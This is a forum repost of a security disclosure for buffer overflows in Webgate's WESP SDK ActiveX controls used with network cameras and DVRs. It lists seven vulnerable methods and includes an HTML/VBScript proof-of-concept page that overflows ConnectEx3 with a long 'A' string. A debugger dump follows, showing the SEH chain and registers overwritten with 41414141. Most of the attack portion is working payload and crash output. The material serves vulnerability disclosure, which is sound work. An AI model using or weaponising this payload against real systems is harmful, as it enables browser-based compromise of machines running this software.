Aerosol Posted February 25, 2015 Report Share Posted February 25, 2015 Webgate technology is focused on digital image processing, embedded systemdesign and networking to produce embedded O/S and web server camerasproviding real time images. We are also making superior network stand-aloneDVRs by applying our accumulated network and video solution knowledge.WEBGATE Embedded Standard Protocol (WESP) SDK supports same tools in bothnetwork DVR and network camera.Webgate Inc. Business Partners: Honeywell, Samsung Techwin, Bosch, PentaxTechnology, Fujitsu AOS Technology, inchttp://www.webgateinc.com/wgi/eng/#2http://www.webgateinc.com/wgi_htdocs/eng/sdk_info.htmlVulnerability 1: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImageBuffer OverflowVulnerability 2: WESP SDK WESPCONFIGLib.UserItem ActiveX ChangePasswordBuffer OverflowVulnerability 3: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveXLoadImageEx Buffer OverflowVulnerability 4: WESP SDK WESPSERIALPORTLib.WESPSerialPortCtrl ActiveXConnect Buffer OverflowVulnerabilit 5: WESP SDK WESPCONFIGLib.IDList ActiveX AddID Buffer OverflowVulnerability 6: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX ConnectBuffer OverflowVulnerability 7: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveXConnectEx3 Buffer OverflowCompanyName WebgateIncFileDescription WESPConfig ModuleFileVersion 1, 6, 42, 0InternalName WESPConfigLegalCopyright Copyright (C) 2004-2010OriginalFileName WESPConfig.DLLProductName WESPConfig ModuleProductVersion 1, 6, 42, 0******************PoC for one of the above Vulnerabilities***********<html><object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'></object><!--targetFile = "C:\Windows\System32\WESPSDK\WESPPlayback.dll"prototype = "Sub ConnectEx3 ( ByVal bDvrs As Integer , ByVal Address AsString , ByVal Port As Integer , ByVal UserID As String , ByVal PasswordAs String , ByVal extcompany As Long , ByVal authType As Long , ByValAdditionalCode As String )"memberName = "ConnectEx3"progid = "WESPPLAYBACKLib.WESPPlaybackCtrl"argCount = 8--><script language='vbscript'>arg1=1arg2=String(1044, "A")arg3=1arg4="defaultV"arg5="defaultV"arg6=1arg7=1arg8="defaultV"target.ConnectEx3 arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 ,arg8</script></html>******************************Stack trace for above PoCException Code: ACCESS_VIOLATIONDisasm: 76ACD33D MOV CX,[EAX]Seh Chain:--------------------------------------------------1 41414141Called From Returns To--------------------------------------------------msvcrt.76ACD33D WESPPlayback.999539WESPPlayback.999539 4141414141414141 22E5E022E5E0 2F712C2F712C 4141414141414141 4141414141414141 4141414141414141 41414141Registers:--------------------------------------------------EIP 76ACD33DEAX 41414141EBX 039E0040 -> 009DF298ECX E0551782EDX 41414141EDI 76AD4137 -> 8B55FF8BESI 76ACD335 -> 8B55FF8BEBP 0022E56C -> 039E0020ESP 0022E56C -> 039E0020Block Disassembly:--------------------------------------------------76ACD333 NOP76ACD334 NOP76ACD335 MOV EDI,EDI76ACD337 PUSH EBP76ACD338 MOV EBP,ESP76ACD33A MOV EAX,[EBP+8]76ACD33D MOV CX,[EAX] <--- CRASH76ACD340 INC EAX76ACD341 INC EAX76ACD342 TEST CX,CX76ACD345 JNZ SHORT 76ACD33D76ACD347 SUB EAX,[EBP+8]76ACD34A SAR EAX,176ACD34C DEC EAX76ACD34D POP EBPArgDump:--------------------------------------------------EBP+8 41414141EBP+12 0022E5E0 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEBP+16 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAAEBP+20 00000829EBP+24 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAAEBP+28 0022E6D4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAStack Dump:--------------------------------------------------22E56C 20 00 9E 03 39 95 99 00 41 41 41 41 E0 E5 22 00 [................]22E57C 2C 71 2F 00 29 08 00 00 2C 71 2F 00 D4 E6 22 00 [.q.......q......]22E58C B4 6F 2F 00 A0 E6 22 00 98 F2 9D 00 00 00 00 00 [.o..............]22E59C B0 BA 2E 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]22E5AC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]P.S. CERT tried to coordinate with the vendor for fixing the issues butthere wasn't any response from vendorBest Regards,Praveen DarshanamSource Quote Link to comment Share on other sites More sharing options...